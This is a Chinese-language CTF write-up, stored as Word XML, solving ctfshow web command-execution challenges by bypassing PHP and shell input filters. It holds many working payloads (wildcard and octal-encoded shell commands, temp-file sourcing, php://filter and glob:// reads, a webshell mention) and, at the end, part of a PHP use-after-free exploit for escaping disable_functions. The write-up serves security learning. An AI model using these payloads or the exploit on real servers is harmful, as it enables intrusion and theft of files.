    <w:p w14:paraId="45DA8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方法3、可以用vi来构造，?c=vi${IFS}f???.php，然后看查源代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C32249">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79CAD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Web55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5FEB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771015"/>
            <wp:effectExtent l="0" t="0" r="825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8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本题主要是过滤了字母，但没有过滤空格和通配符 “ ? ”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934F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方法1、由于未过滤数字，利用 /bin/ 目录下的 base64 进行通配符匹配。获得 flag.php 文件的 base64 编码，构造 ?c=/???/????64 ????.???</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B3360F">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4297045" cy="2288540"/>
            <wp:effectExtent l="0" t="0" r="825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2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方法2、利用 /usr/bin/ 下的 bzip2 命令，先将 flag.php 文件进行压缩，然后再将其下载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A7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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?c=/???/???/????2 ????.???</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D02E77">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1754505"/>
            <wp:effectExtent l="0" t="0" r="8255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0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查看文件，即可得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F53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方法3、用bash无字母命令执行（八进制来表示字母的ASC||码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35433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可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$'\154\163'执行ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（154的十进制是108，即l）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE4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接着构造?c=$'\143\141\164'%20$'\146'*（即cat f*）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C82F52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249847CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B53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Web56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5293BFFD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383790"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6985"/>
            <wp:docPr id="35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400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没有过滤.(点)，.(点)相当source可以执行sh命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E74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首先构建一个html来上传文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C6A4E">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5255895" cy="1750060"/>
            <wp:effectExtent l="0" t="0" r="1905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B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再构建一个txt文本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31388F40">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1734185" cy="984250"/>
            <wp:effectExtent l="0" t="0" r="889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5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将txt上传</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3903AAE0">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5255260" cy="3296285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B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然后用BP进行抓包，将?c=.%20/???/????????[@-[] （其实指. /tmp/phpaabbC）进行GET传参(通过 GET 方式传递：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30507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?c=.+/???/????????[@-[]//后面的[@-[]是linux下面的匹配符，是进行匹配的大写字母。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E814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并在上传文件内容添加sh命令：)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71558105">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="2423795"/>
            <wp:effectExtent l="0" t="0" r="508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4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接下来将ls改为cat flag.php，得到flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F0CE59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A3EA3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228F8C16">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="381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C305"/>
    <w:p w14:paraId="1519F619"/>
    <w:p w14:paraId="0A5B3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Web57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914CB9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.被过滤，又已知flag在36.php里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBFE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根据题目要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>把36构造出来，通过采用Linux Shell中的$(())来进行数学运</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>算，$(())的值为0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B4A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~按位取反，所以$((~$(())))为-1.通过-37取反得到36。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BA40A6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas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Fonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>即构造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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>$((~$((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$((~$(())))))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C599385">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1769110"/>
            <wp:effectExtent l="0" t="0" r="4445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B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Web58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C2A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本题用POST传参</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F02949A">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4271645" cy="1402715"/>
            <wp:effectExtent l="0" t="0" r="508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C8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发现system和passthur被禁用了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35012B76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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用include，c=include $_POST[a];&amp;a=php://filter/convert.base64-encode/resource=flag.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750122F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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用c=show_source('flag.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCEAF94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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用c=highlight_file("flag.php");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2889F42E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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也可以用日志注入，用一句话木马在蚁剑连接查看文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117F59F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="210" w:leftChars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998345"/>
            <wp:effectExtent l="0" t="0" r="889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14FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E700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Web59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E8D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和上题方法一样，注意方法2，3要写明路径为/var/www/html/flag.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655F96E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684020"/>
            <wp:effectExtent l="0" t="0" r="254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D44D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C930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 60 61 62 63 64 65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25663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与web58解法一模一样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1883B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AEDC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Web66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58705EDA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用c=highlight_file("flag.php");发现flag不在这里，那就查看文件目录，用c=print_r(scandir("/"));或者用c=var_dump(scandir('/'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D94FA4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163F4603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2180"/>
        <w:gridCol w:w="2190"/>
      </w:tblGrid>
      <w:tr w14:paraId="470304C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A32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07B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Style w:val="10"/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c = var_dump(scandir('/'))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6B0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c = print_r(scandir('/'))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="67A6F6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3D1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single" w:color="auto" w:sz="2" w:space="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>输出内容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AA8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详细类型 + 值（如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string(1) "."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2D4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仅值（如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[0] =&gt; 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）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7D0A20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238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single" w:color="auto" w:sz="2" w:space="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>变量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c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single" w:color="auto" w:sz="2" w:space="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>的值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0AF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NULL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（因为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var_dump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 无返回值）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832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 或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（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0"/>
                <w:szCs w:val="10"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>print_r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 的返回值）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3D4886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4C4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single" w:color="auto" w:sz="2" w:space="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>主要用途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E6F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调试（需要查看数据类型和结构）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7AB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2"/>
                <w:szCs w:val="1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快速查看变量内容（无需类型信息）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="261ACBC2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8595" cy="1623695"/>
            <wp:effectExtent l="0" t="0" r="8255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7F39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然后用c=highlight_file("/flag")查看flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107065FF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5420" cy="1522095"/>
            <wp:effectExtent l="0" t="0" r="1905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8DD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210" w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA39822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Web67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6382E382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这题和上题类似，就是不能用print_r，那就用c=var_dump(</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>scandir</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>('/'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392AA8A7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5CE94C51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24F6F94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Web68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E61736B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这题较于上题还把highlight_file给过滤了，其实对于txt文本，用include可以直接读取，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177EFF08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当然可以用php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>://filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和data://.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9E1D8E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72405" cy="1634490"/>
            <wp:effectExtent l="0" t="0" r="4445" b="38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3E48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210" w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D7C4F51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Web69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D851F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本题var_dump和print_r被禁了，可以用var_export 来查看目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314878A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44044ED9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700D1C76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0DB36069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780BEB9F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17382026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700CBDB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Web70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E60265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5247E882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94425" cy="1885315"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635"/>
            <wp:docPr id="43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188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0C2EA5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24025778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本题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过滤的东西更多：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D914D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ini_set用来设置php.ini的值，在函数执行的时候生效，脚本结束后，设置失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AE06B6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error_reporting() 函数设置当前脚本的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"https://so.csdn.net/so/search?q=%E9%94%99%E8%AF%AF%E6%8A%A5%E5%91%8A&amp;spm=1001.2101.3001.7020" \t "https://blog.csdn.net/Myon5/article/details/_blank"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错误报告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级别，返回旧的错误报告级别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7A973F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不过上题的 payload仍然可以使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A495205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06F44A4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7838A281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Web71</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDA2269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72405" cy="4366260"/>
            <wp:effectExtent l="0" t="0" r="4445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DC6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0F26E655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本题将数字和字母都转化为了?，但我们注意到eval($c)是在echo preg_replace("/[0-9]|[a-z]/i","?",$s);的前面执行的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7ECF87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源码中没见过的几个函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A488F7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ob_get_contents()：得到输出缓冲区的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364751F9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ob_end_clean()：清除缓冲区的内容，并将缓冲区关闭，但不会输出内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F3288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preg_replace()：执行一个正则表达式的搜索和替换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B15A3D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exit()：输出一个消息并且退出当前脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E6513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000015C4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方法1、在劫持输出缓冲区之前就把缓冲区送出，可以用的函数有：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476DB81D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ob_flush();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FF5639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ob_end_flush();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57889698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payload示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61947C6F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c=include('/flag.txt');ob_flush();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A20B107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73675" cy="1664335"/>
            <wp:effectExtent l="0" t="0" r="3175" b="254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1533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方法2、提前终止程序，即执行完代码直接退出，可以调用的函数有：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A586314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exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF50C87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die();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C31E1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payload示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5957E9AA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c=include('/flag.txt');exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAD7244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620A0546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Web72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EDC5D5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本题的源码和上题一样，但是 scandir() 函数不能访问根目录了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F359726">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="21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2291715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="46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0ECF5C"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F71EAF"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CECBA4"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本题设置了 open_basedir()，将php所能打开的文件限制在指定的目录树中，包括文件本身。因为 ini_set() 也被限制了，所以 open_basedir() 不能用 ini_set() 重新设置绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653A1E3C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那这题用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php 伪协议 glob://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可以实现扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD84FF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(1)c=var_export(scandir('glob:///*'));exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F099F8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(2)c=?&gt;&lt;?php $a = new DirectoryIterator("glob:///*"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC39A6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foreach ($a as $f) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2586687D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{ echo ($f-&gt;__toString().' '); } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445601E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exit(0); ?&gt;  [首先glob查找根目录下的所有目录（glob:// /*这样更加清楚些）。然后循环执行并输出给$f，在输出$f。其实不加前面 ?&gt;&lt;?php 也是可以的。 eval() 里的语句可以视为在当前 php 文件里加了几条语句，这些语句必须是完整的，即必须以 “ ; ” 或者 “ ?&gt; ” 结尾来结束语句，但是eval里的 “ ?&gt; ” 不会闭合当前 php 文件。]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E96D90E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64C7E8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注：__toString() 是 PHP 的「魔术方法」，当一个对象被当作「字符串」使用时（比如这里用 echo 输出），会自动调用这个方法。__toString() 方法默认返回 当前条目的「路径名」。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9B14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 ' '：字符串拼接，给每个条目路径后加一个空格，避免输出的内容连在一起（提升可读性）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EB1612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/* 是通配符模式：/ 是服务器的根目录，*表示「匹配根目录下的所有条目」。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424DE50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foreach 是PHP的循环语句，这里用于遍历DirectoryIterator实例$a，$f会被赋值为当前条目对应的DirectoryIterator对象。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblW w:w="9199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3545"/>
        <w:gridCol w:w="4808"/>
      </w:tblGrid>
      <w:tr w14:paraId="0021DB5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D13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7B1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10"/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DirectoryIterator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版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480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298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scandir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版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="44F9B1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EF5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返回类型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731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DirectoryIterator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对象</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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007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字符串数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="798812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958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遍历方式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095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迭代器遍历（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foreach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4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5A6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数组遍历（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foreach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/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</w:tr>
      <w:tr w14:paraId="306A7E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21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6D4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更高（无需一次性加载所有条目）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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0E1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较低（一次性加载所有条目到内存）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="27E7A0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C2A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4DB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支持更多操作（如判断文件类型、获取权限等）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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34B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仅返回名称，需额外处理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D7DC9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507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错误处理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858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抛出异常（需手动捕获）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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0D6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返回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，需手动检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3EC62B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76B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隐藏文件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983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默认包含（如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和 </w:t>
            </w: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..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4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3FD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默认包含（需手动过滤）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72B92E40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C850510">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210" w:leftChars="0" w:firstLine="840" w:firstLineChars="40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AD9D400">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210" w:leftChars="0" w:firstLine="840" w:firstLineChars="40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34670C0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FE76FD2"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7638D700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5420" cy="1433830"/>
            <wp:effectExtent l="0" t="0" r="1905" b="444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2063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679575"/>
            <wp:effectExtent l="0" t="0" r="1905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29938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327F0DE0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17A801B8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43EAE963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我想c=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>("/flag0.txt");exit();，但是直接报错了。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726DF616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open_basedir 用于限制PHP脚本的文件系统访问路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C97645D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disable_functions 用于禁用PHP中的特定函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA41E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>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486A26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>function ctfshow($cmd) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D312B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global $abc, $helper, $backtrace;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0885D74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0142143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class Vuln {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EE94B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public $a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4144A44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public function __destruct() { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB2C39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global $backtrace; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4595F14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unset($this-&gt;a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1095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$backtrace = (new Exception)-&gt;getTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030418E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if(!isset($backtrace[1]['args'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217FB20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$backtrace = debug_backtrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FC9C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1887D8F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787724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63A0937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3A18AE8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class Helper {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DF41A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public $a, $b, $c, $d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E91C54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1558612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36E78B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str2ptr(&amp;$str, $p = 0, $s = 8) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6BCE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$address = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7080D7B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for($j = $s-1; $j &gt;= 0; $j--) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14146E8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$address &lt;&lt;= 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE84618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$address |= ord($str[$p+$j]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405B8AB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE8828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return $address;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E4C10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4A26E96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894B3F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ptr2str($ptr, $m = 8) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467ECB9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$out = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6727F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for ($i=0; $i &lt; $m; $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7250F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$out .= sprintf("%c",($ptr &amp; 0xff));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1510A8A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$ptr &gt;&gt;= 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243D7EB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD4E2C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return $out;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42D6A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596A146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1EF9C01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write(&amp;$str, $p, $v, $n = 8) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD9EAE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$i = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825C21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for($i = 0; $i &lt; $n; $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472DC42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$str[$p + $i] = sprintf("%c",($v &amp; 0xff));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416F0DC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$v &gt;&gt;= 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3579074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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8B90A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1DF34F7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3402C2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leak($addr, $p = 0, $s = 8) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762FC5A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global $abc, $helper;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF2B7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write($abc, 0x68, $addr + $p - 0x10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2E19A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$leak = strlen($helper-&gt;a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085FFB1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if($s != 8) { $leak %= 2 &lt;&lt; ($s * 8) - 1; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA061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return $leak;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE0B1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59B1A55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2517997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parse_elf($base) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29806A7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$e_type = leak($base, 0x10, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA570E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288A53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$e_phoff = leak($base, 0x20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609F93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$e_phentsize = leak($base, 0x36, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331D1D0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$e_phnum = leak($base, 0x38, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7773B28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01FF925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for($i = 0; $i &lt; $e_phnum; $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20181C4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$header = $base + $e_phoff + $i * $e_phentsize;</w:t>
      </w:r>
    </w:p>
